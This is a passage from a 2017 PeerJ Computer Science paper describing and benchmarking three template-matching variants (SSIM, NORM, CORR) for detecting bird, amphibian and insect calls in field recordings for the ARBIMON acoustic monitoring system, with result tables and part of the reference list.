Fish 152 76 76 Mona Island Megascops nudipes Bird 100 50 50 El Yunque Microcerculus marginatus Bird 80 40 40 Peru Basileuterus chrysogaster Bird 60 30 30 Peru Myrmoborus leucophrys Bird 160 80 80 Peru Basileuterus bivittatus Bird 100 50 50 Peru Liosceles thoracicus Bird 76 38 38 Peru Chlorothraupis carmioli Bird 112 56 56 Peru Megascops guatemalae Bird 28 8 20 Peru Saltator grossus Bird 68 34 34 Peru Myrmeciza hemimelaena Bird 180 90 90 Peru Thamnophilus schistaceus Bird 60 30 30 Peru Hypocnemis subflava Bird 140 70 70 Peru Percnostola lophotes Bird 100 50 50 Peru Formicarius analis Bird 80 40 40 Peru delimited by starting time, ending time, lowest frequency and highest frequency along with a species and sound type. The species included in the analysis are listed in Table 1, along with the number of total recordings and the number of recordings where the species is present or absent. Algorithm The algorithm recognition process is divided into three phases: (1) Template Computation, (2) Model Training and (3) Detection (see Fig. 3). In Template computation, all ROIs submitted by the user in the training set are aggregated into a template. In Model Training the template is used to compute recognition functions from validated audio recordings and features from the resulting vector V are computed. These features are used to train a random forest model. In the Detection phase the template is used to compute the features, but this time the features are fed to the trained random forest model to compute a prediction of presence or absence. In the following sections the Template Computation process will be explained, then the process of using the Template to extract features from a recording is presented and finally, the procedures to use the features to train the model and to detect recordings are discussed. Template computation The template refers to the combination of all ROIs in the training data. To create a template, we first start with the examples of the specific call of interest (i.e., ROIs) that were annotated Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 4/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 3 The three phases of the algorithm to create the species-specific models. In the Model Training phase Reci is a recording, Vi is the vector generated by the recognition function on Reci and in the Detec- tion phase V is the vector generated by the recognition function on the incoming recording. from a set of recordings for a given species and a specific call type (e.g., common, alarm). Each ROI encompasses an example of the call, and is an instance of time between time t1 and time t2 of a given recording and low and high boundary frequencies of f1 and f2, where t1 < t2 and f1 < f 2. In a general sense, we combine these examples to produce a template of a specific song type of a single species. Specifically, for each recording that has an annotated ROI, a spectrogram matrix (SM) is computed using the Short Time Fourier Transform with a frame size of 1024 samples, 512 samples of overlap and a Hann analysis window, thus the matrices have 512 rows. For a recording with a sampling rate of 44,100 Hz, the matrix bin bandwidth is approximately 43.06 Hz. The SM is arranged so that the row of index 0 represents the lowest frequency and the row with index 511 represents the highest frequency of the spectrum. Properly stated the columns c1 to c2 and the rows from r1 to r2 of SM were extracted, where: c1=bt1×44,100c, c2=bt2×44,100c, r1=bf1/43.06c and r2=bf2/43.06c. The rows and columns that represent the ROI in the recording (between frequencies f1 and f2 and between times t1 and t2) are extracted. The submatrix of SM that contains only the area bounded by the ROI is define as SMROI and refer in the manuscript as the ROI matrix. Since the ROI matrices can vary in size, to compute the aggregation from the ROI matrices we have to take into account the difference in the number of rows and columns of the matrices. All recordings have the same sampling rate, 44,100 Hz. Thus, the rows from different SMs, computed with the same parameters, will represent the same frequencies, i.e., rows with same indexes represent the same frequency. After the ROI matrix, SMROI , has been extracted from SM, the rows of SMROI will also represent specific frequencies. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 5/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 4 Flowchart of the algorithm to generate the template of each species. Thus, if we were to perform an element-wise matrix sum between two ROI matrices with potentially different number of rows, we should only sum rows that represent the same frequency. To take into account the difference in the number of columns of the ROI matrices, we use the Frobenius norm to optimize the alignment of the smaller ROI matrices and perform element-wise sums between rows that represent the same frequency. We present that algorithm in the following section and a flow chart of the process in Fig. 4. Template computation algorithm: 1. Generate the set of SMROI matrices by computing the short time Fourier Transform of all the user generated ROIs. 2. Create matrix SMmax, a duplicate of the first created matrix among the matrices with the largest number of columns. 3. Set cmax as the number of columns in SMmax. 4. Create matrix Ttemp, with the same dimensions as SMmax and all entries equal to 0. This matrix will contain the element-wise addition of all the extracted SMROI matrices. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 6/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 5. Create matrix W with the same dimensions of SMmax and all entries equal to 0. This matrix will hold the count on the number of SMROI matrices that participate in the calculation of each element of Ttemp. 6. For each one of the SMi ROI matrices in SMROI : (a) If SMi has the same number of columns as Ttemp: i. Align the rows of SMi and Ttemp so they represent equivalent frequencies and perform an element-wise addition of the matrices and put the result in Ttemp. ii. Add one to all the elements of the W matrix where the previous addition participated. (b) If the number of columns differs between SMi and Ttemp, then find the optimal alignment with SMmax as follows: i. Set ci as the number of columns in SMi. ii. Define (SMmax)I as the set of all submatrices of SMmax with the same dimensions as SMi. Note that the cardinality of (SMmax)I is cmax−ci. iii. For each Subk ∈(SMmax)I : A. Compute dk =NORM(Subk−SMi) where NORM is the Frobenius norm defined as: NORM(A)= √∑ (i,j) |a2i,j| where ai,j are the elements of matrix A. iv. Define Submin{dk} as the Subk matrix with the minimum dk. This is the optimal alignment of SMi with SMmax. v. Align the rows of Submin{dk} and Ttemp so they represent equivalent frequencies, perform an element-wise addition of the matrices and put the result in Ttemp. vi. Add one to all the elements of the W matrix where the previous addition participated. 7. Define the matrix Ttemplate as the element-wise division between the Ttemp matrix and the W matrix. The resulting Ttemplate matrix summarizes the information available in the ROI matrices submitted by the user and it will be used to extract information from the audio recordings that are to be analyzed. In this article each species Ttemplate was created using five ROIs. In Fig. 5A a training set for the Eleutherodactylus coqui is presented and in Fig. 5B the resulting template can be seen. This tool is very useful because the user can see immediately the effect of adding or subtracting a specific sample to the training set. Model training The goal of this phase is to train a random forest model. The input to train the random forest are a series of statistical features extracted from vectors Vi that are created by computing a recognition function (similarity measure) between the computed Ttemplate and submatrices of the spectrogram matrices of a series of recordings. In the following section, we present the details of the algorithm that processes a recording to create the recognition function vector, and in Fig. 6 we present a flowchart of the process. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 7/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 5 (A) A training set with 16 examples of the call of E. coqui. (B) The resulting template from the training set. Figure 6 Flowchart of the algorithm to generate the similarity vector of each recording. Algorithm to Create the Similarity Vector: 1. Compute matrix SPEC, the submatrix of the spectrogram matrix that contains the frequencies in Ttemplate. Note that we are dealing with recordings that have the same sample rate as the recordings used to compute the Ttemplate. 2. Define cSPEC, the number of columns of SPEC. 3. Define ctemplate, the number of columns of Ttemplate. Note that cSPEC �ctemplate since the SPEC matrix have the same number of columns as the whole spectrogram and that the Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 8/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 1Note that for recordings with a sample rate of 44,100 when we calculate the STFT with a window of size 512 and a 50% overlap, one step is equivalent to 5.8 ms; therefore, 16 steps is less than 100 ms. Although this procedure may miss the strongest match, the length of the calls are much longer than the step interval; therefore, there is a high probability of detecting the species-specific call. Ttemplate matrix fits c =cSPEC −ctemplate+1 times inside the SPEC matrix. There are c submatrices of SPEC with the same dimensions as Ttemplate. 4. Define step, the step factor by which Ttemplate will progressed over the SPEC matrix. 5. Define n= ⌊ cSPEC−ctemplate step ⌋ +1. Note that if step=1 then n=c. In this work, however, this parameter was selected as step=16 as a trade-off for speed.1 6. Define SPECi as the submatrix of SPEC that spans the columns from i×step to i×step+ ctemplate. 7. Set i=1. 8. While i≤n (a) Compute the similarity measure measi for SPECi (the definition of measi for each of the three variants is provided in the following section). (b) Increase i by 1. Note that this is equivalent to progressing step columns in the SPEC matrix. 9. Define the vector V as the vector containing the n similarity measures resulting from the previous steps. That is, V =[meas1,meas2,meas3,...,measn]. Recognition function We used three variations of a pattern match procedure to define the similarity measure vector V . First, the Structural Similarity Index described in Wang et al. (2004) and implemented in Van der Walt et al. (2014) as compare_ssim with the default window size of seven unless the generated pattern is smaller. It will be referred in the rest of the manuscript as the SSIM variant. For the SSIM variant we define measi as: measi=SSI(Ttemplate,SPECi), where SPECi is the submatrix of SPEC that spans the columns from i× step to i×step+ ctemplate and the same number of rows as Ttemplate and V =[meas1,meas2,meas3, ...,measn] with n= ⌊ cSPEC −ctemplate step ⌋ +1. Second, the dynamic thresholding method (threshold_adaptive) described in Van der Walt et al. (2014) with a block size of 127 and an arithmetic mean filter is used over both Ttemplate and SPECi before multiplying them and applying the Frobenius norm and normalized by the norm of a matrix with same dimensions as Ttemplate and all elements equal to one. Therefore, measi for the NORM variant is defined as: measi=FN ( DTM(Ttemplate) .∗ DTM(SPECi) ) /FN(U), where again SPECi is the submatrix of SPEC that spans the columns from i×step to i×step+ ctemplate, FN is the Frobenius norm, DTM is the dynamic thresholding method, U is a matrix with same dimensions as Ttemplate with all elements equal to one and .∗performs an element-wise multiplication of the matrices. Again, V =[meas1,meas2,meas3,...,measn] with n= ⌊ cSPEC −ctemplate step ⌋ +1. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 9/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Finally, for the CORR variation we first apply the OpenCV’s matchTemplate procedure (Bradski, 2000) with the Normalized Correlation Coefficient option to SPECi, the submatrix of SPEC that spans the columns from i×step to i×step+ ctemplate. However, for this variant, SPECi includes two additions rows above and below, thus it is slightly larger than the Ttemplate. With these we can define: measj,i=CORR(Ttemplate,SPECj,i) where SPECj,i is the submatrix of SPECi that starts at row j (note that there are five such SPECj,i matrices). Now, we select five points at random from all the points above the 98.5 percentile of measj,i and apply the Structural Similarity Index to the 5 strongly-matching regions. The size of these regions is eight thirds (8/3) of the length of Ttemplate, 4/3 before and 4/3 after the strongly-matched point that was selected. Then, define FilterSPEC as the matrix that contains these 5 strongly-matching regions and FilterSPECi as the submatrix of FilterSPEC that spans the columns from i to i+ ctemplate then, the similarity measure for this variant is define as: measi=SSI(Ttemplate,FilterSPECi) and the resulting vector V =[meas1,meas2,meas3,...,measn] but this time with n=5× (⌊ 8/3×ctemplate ⌋ +1 ) . It is important to note that no matter which variant is used to calculate the similarity measures, the result will always be a vector of measurements V . The idea is that the statistical properties of these computed recognition functions have enough information to distinguish between a recording that has the target species present and a recording that does not have the target species present. However, notice that since cSPEC, the length of SPEC, is much larger that ctemplate the length of the vector V for the CORR variant is much smaller than the other two. Random forest model creation After calculating V for many recordings we can train a random forest model. First, we need a set of validated recordings with the specific species vocalization present in some recordings and absent in others. Then for each recording we compute a vector Vi as described in the previous section and extract the statistical features presented in Table 2. These statistical features represent the dataset used to train the random forest model, which will be used to detect recordings for presence or absence of a species call event. These 12 features along with the species presence information are used as input to a random forest classifier with a 1,000 trees. Recording detection Now that we have a trained model to detect a recording, we have to compute the statistical features from the similarity vector V of the selected recording. This is performed in the same way as it was described in the previous section. These features are then used as the input dataset to the previously trained random forest classifier and a label indicating presence or absence of the species in the recording is given as output. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 10/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Table 2 The statistical features extracted from vector V . Features 1. mean 2. median 3. minimum 4. maximum 5. standard deviation 6. maximum–minimum 7. skewness 8. kurtosis 9. hyper-skewness 10. hyper-kurtosis 11. Histogram 12. Cumulative frequency histogram The experiment In order to decide which of the three variants should be incorporated into the ARBIMON web-based system, we performed the algorithm explained in the previous section with each of the similarity measures. We computed 10-fold validations on each of the variants to obtained measurements of the performance of the algorithm. In each validation, 90% of the data is used as training and 10% of the data is used as validation data. Each algorithm variant used the same 10-fold validation partition for each species. The measures calculated were the area under the receiver operating characteristic (ROC) curve (AUC), accuracy or correct detection rate (Ac), negative predictive value (Npv), precision or positive predictive value (Pr), sensitivity, recall or true positive rate (Se) and specificity or true negative rate (Sp). To calculate the AUC, the ROC curve is created by plotting the false positive rate (which can be calculated as 1− specificity) against the true positive rate (sensitivity), then, the AUC is created by calculating the area under that curve. Notice that the further the AUC is from 0.5 the better. The rest of the measures are defined as follows: Ac = tp+tn tp+tn+fp+fn , Npv = tn tn+fn , Pr = tp tp+fp , Se= tp tp+fn and Sp= tn tn+fp with tp the number of true positives (number of times both the expert and the algorithm agree that the species is present), tn the number of true negatives (number of times both the expert and the algorithm agree that the species is not present), fp the number of false positives (number of times the algorithm states that the species is present while the expert states is absent) and fn the number of false negatives (number of times the algorithm states that the species is not present while the expert states it is present). Note that accuracy is a weighted average of the sensitivity and the specificity. Although we present and discuss all measures, we gave accuracy and the AUC more importance because they include information on the true positive and true negative rates. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 11/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Specifically, AUC is important when the number of positives is different than the number of negatives as is the case with some of the species. The experiment was performed in a computer with an Intel i7 4790K 4 cores processor at 4.00 GHz with 32 GB of RAM and running Ubuntu Linux. The execution time needed to detect each recording was registered and the mean and standard deviation of the execution times were calculated for each variant of the algorithm. We also computed the quantity of pixels on all the Ttemplate matrices and correlated with the execution time of each of the variants. A global one-way analysis of variance (ANOVA) was performed on the five calculated measures across all of the 10-fold validations to identify if there was a significant difference between the variants of the algorithm. Then, a post-hoc Tukey HSD comparison test was performed to identify which one of the variants was significantly different at the 95% confidence level. Additionally, an ANOVA was performed locally between the 10-fold validation of each species and on the mean execution time for each species across the algorithm variants to identify if there was any significant execution time difference at the 95% confidence level. Similarly, a post-hoc Tukey HSD comparison test was performed on the execution times. RESULTS The six measurements (area under the ROC curve—AUC, accuracy, negative predictive value, precision, sensitivity and specificity) computed to compared the model across the three variants varied greatly among the 21 species. The lowest scores were among bird species while most of the highest scores came from amphibian species. Table 3 presents a summary of the results of the measurements comparing the three variants of the algorithm (for a detail presentation, see Appendix 1). The NORM variant did not have the highest value for any of the measures summarized in Table 3, while the CORR variant had a greater number of species with 80% or greater for all the measures and an overall median accuracy of 81%. We considered these two facts fundamental for a general-purpose species detection system. The local species ANOVA suggested that there are significant accuracy differences at the 95% significance level for six of the 21 species studied as well as four in terms of precision and three in terms of specificity (see https://doi.org/10.6084/m9.figshare.4488149.v1). The algorithm variant CORR had a higher mean and median AUC at 78% and 81% respectively, but the SSIM variant seems to be more stable with a standard deviation of 20%. In terms of accuracy, both the SSIM and CORR have higher mean accuracy than the NORM variant. Nevertheless, variant CORR had the highest median accuracy of 81%, which is slightly higher than the median accuracy of the SSIM variant at 76%. In addition, variant CORR had more species with an accuracy of 80% or greater. In terms of median precision, the three variants had similar values, although in terms of mean precision variants SSIM and CORR have greater values than the NORM variant. Moreover, the median and mean precision of the SSIM variant were only 1% higher than the median and mean precision of the CORR variant. In terms of sensitivity, variants SSIM Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 12/23 https://peerj.com https://doi.org/10.6084/m9.figshare.4488149.v1 http://dx.doi.org/10.7717/peerj-cs.113 Table 3 Summary of the measures of the three variants of the algorithm. Best values are in bold. Summary of measures SSIM NORM CORR Number of species with an Area under the curve of 80% or greater 8 7 12 Number of species with statistically significant Area under the curve 0 0 0 Mean Area under the curve 0.76 0.71 0.78 Median Area under the curve 0.75 0.72 0.81 Standard Deviation of Area under the curve 0.20 0.21 0.21 Number of species with an Accuracy of 80% or greater 8 7 12 Number of species with statistically significant Accuracy 3 0 3 Mean Accuracy 0.77 0.73 0.77 Median Accuracy 0.76 0.75 0.81 Standard Deviation of Accuracy 0.12 0.14 0.14 Number of species with a Negative predictive value of 80% or greater 7 5 10 Number of species with statistically significant Negative predictive value 0 0 0 Mean Negative predictive value 0.73 0.71 0.74 Median Negative predictive value 0.71 0.75 0.79 Standard Deviation of Negative predictive value 0.08 0.12 0.13 Number of species with a Precision of 80% or greater 5 5 9 Number of species with statistically significant Precision 2 0 2 Mean Precision 0.73 0.68 0.72 Median Precision 0.75 0.73 0.74 Standard Deviation of Precision 0.12 0.13 0.16 Number of species with a Sensitivity of 80% or greater 8 6 11 Number of species with statistically significant Sensitivity 0 0 0 Mean Sensitivity 0.77 0.70 0.74 Median Sensitivity 0.79 0.73 0.80 Standard Deviation of Sensitivity 0.12 0.16 0.17 Number of species with a Specificity of 80% or greater 4 6 7 Number of species with statistically significant Specificity 3 0 0 Mean Specificity 0.69 0.68 0.72 Median Specificity 0.67 0.70 0.75 Standard Deviation of Specificity 0.13 0.15 0.16 Ratio of False positive to True positive 0.37 0.47 0.39 Ratio of False negative to True positive 0.45 0.47 0.39 Ratio of False positive to True negative 0.3 0.43 0.35 Ratio of False negative to True negative 0.37 0.43 0.35 and CORR had greater values than the NORM variant. It is only in terms of specificity that the CORR variant has greater values than all other variants. Figures 7 and 8 present a summary of these results with whisker graphs. In terms of execution times, an ANOVA analysis on the mean execution time suggests a difference between the variants (F =9.9341e+30,df =3,p < 2.2e–16). The CORR variant had the lowest mean execution time at 0.255 s followed closely by the NORM variant with 0.271 s, while the SSIM variant had the slowest mean execution time of 2.269 s (Fig. 9). The Tukey HSD test suggests that there was no statistical significant difference between the Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 13/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 7 Whisker boxes of the 10-fold validations for the three variants of the presented algorithm for: (A) Area under the ROC curve and (B) Accuracy. Table 4 Summary of the execution times of the three variants of the algorithm. Best values are in bold. PPMCC is the Pearson product-moment correlation coefficient. Summary of execution times SSIM NORM CORR Mean Execution Time 2.27 0.27 0.26 Standard Deviation of Execution Time 3.04 0.06 0.07 PPMCC between Execution Time and size of template 0.96 0.33 0.11 mean execution times of the NORM and CORR variants (p=0.999). However, there was a statistical significant difference at the 95% confidence level between the mean execution times of all other pairs of variants, specifically variants SSIM and CORR (p < .2e–16). Moreover, the mean execution time of the SSIM variant increased as the number of pixels in the Ttemplate matrix increases (Fig. 9B). There was no statistically significant relationship between the Ttemplate pixel size and the execution time for the other two variants (Table 4). In summary, variants SSIM and CORR outperform the NORM variant in most of the statistical measures computed having statistically significant high accuracy for three species each. In terms of execution time, the CORR variant was faster than the SSIM variant (Table 3), and the mean execution time of CORR variant did not increase with increasing Ttemplate size (Table 4). DISCUSSION The algorithm used by the ARBIMON system was selected by comparing three variants of a template-based method for the detection of presence or absence of a species vocalization in recordings. The most important features for selecting the algorithm were that it works well for many types of species calls and that it can process hundreds of thousands of recordings in a reasonable amount of time. The CORR algorithm was selected because of its speed Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 14/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 8 Whisker boxes of the 10-fold validations for the three variants of the presented algorithm for: (A) Negative predictive value, (B) Precision, (C) Sensitivity and (D) Specificity. and its comparable performance in terms of detection efficiency with the SSIM variant. It achieved AUC and accuracy of 0.80 or better in 12 of the 21 species and sensitivity of 0.80 or more in 11 of the 21 species and the average execution time of 0.26 s per minute of recording means that it can process around 14,000 minutes of recordings per hour. The difference in execution time between the SSIM variant and the other two was due to a memory management issue in the SSIM algorithm. An analysis revealed that all the Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 15/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 9 (A) Whisker boxes of the execution times of the three algorithms. (B) Execution times as a function of the size of the template in number of pixels. algorithms have time complexity of O (( cSPEC −ctemplate ) ×ctemplate×rtemplate ) where cSPEC and ctemplate are the number of columns in SPEC and Ttemplate respectively and rtemplate is the number of rows in Ttemplate. The only explanation we can give is that the SSIM function uses an uniformly distributed filter (uniform_filter) that has a limit on the size of the memory buffer (4,000 64-bit doubles divided by the number of elements in the dimension been process). Therefore, as the size of Ttemplate increases the number of calls to allocate the buffer, free and allocate again can become a burden since it has a smaller locality of reference even when the machine has enough memory and cache to handle the process. Further investigation is required to confirm this. An interesting comparison is the method described in the work by Fodor (2013) and adapted and tested by Lasseck (2013). This method was design for the Neural Information Processing Scaled for Bioacoustics (NIPS4B) competition, and although the results are very good they do not report on time of execution. As we have mentioned, it is very important to us to have a method that provides good response times and the execution time of Lasseck’s method seems to be greater than ours given the extensive pre-processing that the method performs. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 16/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Table 5 Summary of the usage of the ARBIMON2 system and its model creation feature. Number of users in the system 453 Number of recordings in the system 1,749,551 Number of models created by users 659 Total number of detected recordings 3,780,552 Number of distinct detected recordings 723,054 Average times a recording is detected 5.22 Standard deviation of the number of times a recording is detected 7.78 Maximum number of times a recordings has been detected 58 CONCLUSIONS AND FUTURE WORK Now that passive autonomous acoustic recorders are readily available the amount of data is growing exponentially. For example, one permanent station recording one minute of every 10 minutes every day of the year generates 52,560 one minute recordings. If this is multiplied by the need to monitor thousands of locations across the planet, one can understand the magnitude of the task at hand. We have shown how the algorithm used in the ARBIMON II web-based cloud-hosted system was selected. We compared the performance in terms of the ability to detect and the efficiency in terms of time execution of three variants of a template-based detection algorithm. The result was a method that uses the power of a widely use method to determine the similarity between two images (Structural Similarity Index (Wang et al., 2004)), but to accelerate the detection process, the analysis was only done in regions where there was a strong-match determined by the OpenCV’s matchTemplate procedure (Bradski, 2000). The results show that this method performed better both in terms of ability to detect as well as in terms of execution time. A fast and accurate general-purpose algorithm for detecting presence or absence of a species complements the other tools of the ARBIMON system, such as options for creating playlists based on many different parameters including user-created tags (see Table 5). For example, the system currently has 1,749,551 1-minute recordings uploaded by 453 users and 659 species specific models have been created and run over 3,780,552 min of recordings of which 723,054 are distinct recordings. While this research was a prove of concept, we provide the tools and encourage users to increase the size of the training data set as this should improve the performance of the algorithm. In addition, we will pursue other approaches, such as multi-label learning (Xie et al., 2016; Zhang et al., 2016; Briggs et al., 2012). As a society, it is fundamental that we study the effects of climate change and deforestation on the fauna and we have to do it with the best possible tools. We are collecting a lot of data, but until recently there was not an intuitive and user-friendly system that allowed scientists to manage and analyze large number of recordings. Here we presented a web-based cloud-hosted system that provides a simple way to manage large quantities of recordings with a general-purpose method to detect their presence in recordings. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 17/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 ACKNOWLEDGEMENTS The authors want to thank Marconi Campos-Cerqueira for his helpful comments on the manuscript. APPENDIX 1 Table 6 provide a detail presentation of the performance of each variant of the algorithm: The area under the ROC curve, mean accuracy, mean precision, mean sensitivity and mean specificity values for each species, of the 10-fold validations for the three variants of the presented algorithm (SSIM, NORM and CORR). The mean, median and standard deviation values across all species are presented at the bottom of the table. APPENDIX 2 The templates created by the training sets of each species are presented. We classified them by the algorithm that presented a better accuracy for that species. Figure 10 presents the templates of the species where the SSIM variant presented better accuracy, Fig. 11 presents those where the NORM variant presented better accuracy, and Fig. 12 presents the species where the CORR variant presented better accuracy. Figure 10 Sample of species that the SSIM variant presented better accuracy. (A) F. analis, (B) M. hemimelaena, (C) E. cooki, (D) P. lophotes, (E) E. coqui, (F) T. schistaceus and (G) H. subflava. Species (A–C) are statistically significant. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 18/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Table 6 Area Under the ROC Curve (AUC), Accuracy (Ac), negative predictive value (Npv), precision (Pr), sensitivity (Se) and specificity (Sp) of the 21 species and three variants of the algorithm. Best values are shaded and the cases where the ANOVA suggested a significant difference between the algorithm variants at the 95% con- fidence level are in bold . Species SSIM NORM CORR AUC Ac Npv Pr Se Sp AUC Ac Npv Pr Se Sp AUC Ac Npv Pr Se Sp E. brittoni 1.00 0.92 0.81 0.77 0.72 0.95 0.42 0.89 0.83 0.80 0.77 0.92 1.00 0.98 0.84 0.80 0.77 1.00 E. cochranae 1.00 0.87 0.84 0.94 0.88 0.85 0.88 0.72 0.70 0.81 0.77 0.68 1.00 0.98 0.96 1.00 0.97 1.00 M. guatemalae 0.50 0.93 0.81 0.50 0.45 0.97 1.00 0.97 0.82 0.50 0.45 1.00 0.50 0.90 0.80 0.47 0.45 0.87 E. cooki 1.00 0.96 0.85 0.77 0.77 0.97 0.72 0.82 0.78 0.73 0.67 0.87 0.88 0.89 0.82 0.72 0.73 0.92 Unknown Insect 1.00 0.90 0.79 0.84 0.75 0.82 1.00 0.92 0.84 0.83 0.82 0.83 1.00 0.90 0.79 0.84 0.75 0.82 E. coqui 0.88 0.90 0.75 0.96 0.93 0.70 0.92 0.86 0.75 0.88 0.96 0.47 1.00 0.88 0.85 0.89 0.98 0.47 M. leucophrys 0.98 0.87 0.88 0.87 0.89 0.87 0.77 0.76 0.79 0.74 0.81 0.72 0.98 0.88 0.87 0.89 0.87 0.90 E. juanariveroi 0.20 0.78 0.69 0.60 0.48 0.79 0.50 0.88 0.70 0.55 0.48 0.83 0.63 0.81 0.69 0.47 0.45 0.80 M. nudipes 0.90 0.74 0.76 0.75 0.77 0.74 0.84 0.81 0.84 0.80 0.85 0.79 0.90 0.85 0.83 0.88 0.82 0.86 B. bivittatus 0.77 0.59 0.65 0.65 0.64 0.65 0.90 0.74 0.78 0.73 0.80 0.73 0.95 0.85 0.84 0.88 0.83 0.87 C. carmioli 0.78 0.77 0.75 0.83 0.73 0.83 0.78 0.73 0.75 0.73 0.76 0.72 0.83 0.81 0.80 0.86 0.80 0.84 L. thoracicus 0.70 0.73 0.71 0.76 0.67 0.79 0.90 0.76 0.80 0.73 0.80 0.77 0.97 0.81 0.83 0.82 0.84 0.80 F. analis 0.82 0.81 0.81 0.79 0.82 0.79 0.68 0.63 0.65 0.63 0.69 0.57 0.57 0.58 0.59 0.58 0.62 0.55 E. guttatus 0.74 0.69 0.70 0.69 0.70 0.69 0.72 0.75 0.76 0.77 0.77 0.75 0.78 0.77 0.77 0.78 0.77 0.77 M. hemimelaena 0.75 0.76 0.71 0.77 0.67 0.82 0.61 0.59 0.59 0.58 0.60 0.57 0.61 0.63 0.62 0.63 0.65 0.59 B. chrysogaster 0.56 0.68 0.66 0.67 0.62 0.74 0.69 0.75 0.70 0.72 0.65 0.83 0.80 0.73 0.69 0.64 0.66 0.78 S. grossus 0.70 0.66 0.66 0.68 0.66 0.67 0.78 0.74 0.72 0.75 0.70 0.76 0.81 0.71 0.73 0.74 0.78 0.62 P. lophotes 0.73 0.71 0.68 0.73 0.63 0.78 0.58 0.58 0.60 0.59 0.62 0.57 0.65 0.61 0.63 0.62 0.64 0.61 H. subflava 0.74 0.64 0.64 0.64 0.66 0.61 0.51 0.51 0.51 0.52 0.53 0.49 0.51 0.51 0.52 0.51 0.56 0.48 M. marginatus 0.58 0.59 0.55 0.60 0.59 0.51 0.32 0.49 0.43 0.47 0.39 0.47 0.69 0.61 0.62 0.61 0.66 0.56 T. schistaceus 0.62 0.58 0.58 0.61 0.51 0.67 0.30 0.50 0.46 0.45 0.49 0.43 0.28 0.52 0.48 0.49 0.44 0.52 Mean values 0.76 0.77 0.73 0.73 0.69 0.77 0.71 0.73 0.71 0.68 0.68 0.70 0.78 0.77 0.74 0.72 0.72 0.74 Median values 0.75 0.76 0.71 0.75 0.67 0.79 0.72 0.75 0.75 0.73 0.70 0.73 0.81 0.81 0.79 0.74 0.75 0.80 Standard Dev. 0.20 0.12 0.09 0.12 0.13 0.12 0.21 0.14 0.12 0.13 0.15 0.16 0.21 0.14 0.13 0.16 0.16 0.17 C orrada B ravo etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.113 19/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 11 Sample of species that the NORM variant presented better accuracy. (A) Unknown Insect, (B) B. chrysogaster, (C) S. grossus, (D) M. guatemalae and (E) E. juanariveroi. Neither is statistically significant. Figure 12 Sample of species that the CORR variant presented better accuracy. (A) E. cochranae, (B) M. leucophrys, (C) B. bivittatus, (D) C. carmioli, (E) M. marginatus, (F) M. nudipes, (G) E. brittoni, (H) E. gut- tatus and (I) L. thoracicus. Species (A–C) are statistically significant. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 20/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Carlos J. Corrada Bravo and T. Mitchell Aide are the founders of Sieve Analytics, Inc. Rafael Álvarez Berríos was an employee of Sieve Analytics, Inc. Author Contributions • Carlos J. Corrada Bravo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Rafael Álvarez Berríos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • T. Mitchell Aide conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Corrada Bravo, Carlos J (2016): Code, recordings, validations and Regions of interest. figshare. https://doi.org/10.6084/m9.figshare.4488149.v1. REFERENCES Acevedo MA, Corrada-Bravo CJ, Corrada-Bravo H, Villanueva-Rivera LJ, Aide TM. 2009. Automated classification of bird and amphibian calls using ma- chine learning: a comparison of methods. Ecological Informatics 4:206–214 DOI 10.1016/j.ecoinf.2009.06.005. Acevedo M, Villanueva-Rivera L. 2006. Using automated digital recording systems as effective tools for the monitoring of birds and amphibians. Wildlife Society Bulletin 34:211–214 DOI 10.2193/0091-7648(2006)34[211:UADRSA]2.0.CO;2. Adams MD, Law BS, Gibson MS. 2010. Reliable automation of bat call identification for Eastern New South Wales, Australia, using classification trees and anascheme software. Acta Chiropterologica 12(1):231–245. Aide TM, Corrada-Bravo C, Campos-Cerqueira M, Milan C, Vega G, Alvarez R. 2013. Real-time bioacoustics monitoring and automated species identification. PeerJ 1:e103 